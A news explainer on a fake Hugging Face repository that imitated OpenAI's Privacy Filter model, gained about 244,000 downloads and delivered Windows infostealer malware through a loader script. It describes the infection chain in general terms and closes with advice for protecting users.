Malicious model hits 244,000 downloads

A Hugging Face model page is supposed to feel like a boring piece of infrastructure. You grab weights, maybe copy a snippet, and move on. But that trust is exactly what got abused here. A fake repository pretending to be OpenAI’s new Privacy Filter model climbed to the top of Hugging Face’s trending list, pulled in roughly 244,000 downloads, and turned out to be a malware delivery system. (hiddenlayer.com) ### What was the fake repo? The malicious repository was called `Open-OSS/privacy-filter`. (thehackernews.com) It was designed to look like OpenAI’s legitimate `openai/privacy-filter` release, which OpenAI launched on April 22, 2026 as an open-weight model for detecting and redacting personally identifiable information in text. HiddenLayer said the fake page copied the real model card almost word for word, which is what made the lure work. (hiddenlayer.com) ### Why did people trust it? Because it looked popular and official enough. Researchers said the fake repo hit Hugging Face’s top trending spot within about 18 hours and showed around 244,000 downloads plus 667 likes before it was disabled. Some of those signals may have been botted, but the point is the same — once a repo looks active, users start treating visibility as proof. (hiddenlayer.com) ### How did the malware actually get delivered? Not through the model weights alone, but through the setup path around them. HiddenLayer said the README told users to clone the repo and run `start.bat` on Windows or `python loader.py` on Linux or macOS. That `loader.py` included decoy code so it looked normal, then disabled SSL verification, pulled a command from a public JSON paste service, and kicked off a PowerShell chain. (hiddenlayer.com) ### What did that payload do? On Windows, it moved into classic infostealer behavior. HiddenLayer said later stages tried to elevate privileges, add Microsoft Defender exclusions, download another binary, and set persistence with a scheduled task. The final malware targeted browser credentials, session cookies, Discord tokens, crypto wallets, SSH keys, FTP credentials, VPN data, and other sensitive files. (thehackernews.com) ### Was every platform equally exposed? No — Windows users were in the blast radius for the full infostealer chain. HiddenLayer’s write-up focused its “treat the system as fully compromised” guidance on Windows hosts that executed the repo’s scripts. That said, the cross-platform install instructions were part of the social engineering. They made the project feel like a normal developer tool instead of a trap. (hiddenlayer.com) ### Why is this a bigger deal than one bad repo? Because AI model hubs are starting to inherit the same supply-chain problems that hit PyPI, npm, and GitHub. The attack did not need a zero-day. It needed a trusted brand name, a copied README, and enough fake engagement to get surfaced by recommendation systems. CSO had already flagged similar risks around poisoned model files and AI supply-chain abuse well before this incident. (hiddenlayer.com) ### What should users do differently now? Treat model repos like executable software, not like passive downloads. Check the publisher namespace carefully. Prefer links from the vendor’s own announcement page. Be suspicious of repos that ask you to run helper scripts before you understand what they do. And if a machine ran this fake repo on Windows, HiddenLayer’s advice was blunt — isolate it, reimage it, and rotate basically every credential that touched that box. (hiddenlayer.com) ### Bottom line The scary part is not just the malware. It’s how ordinary the lure was. A copied model card, a trusted brand, and a trending badge were enough to turn an AI repository into a supply-chain attack. (hiddenlayer.com) (csoonline.com)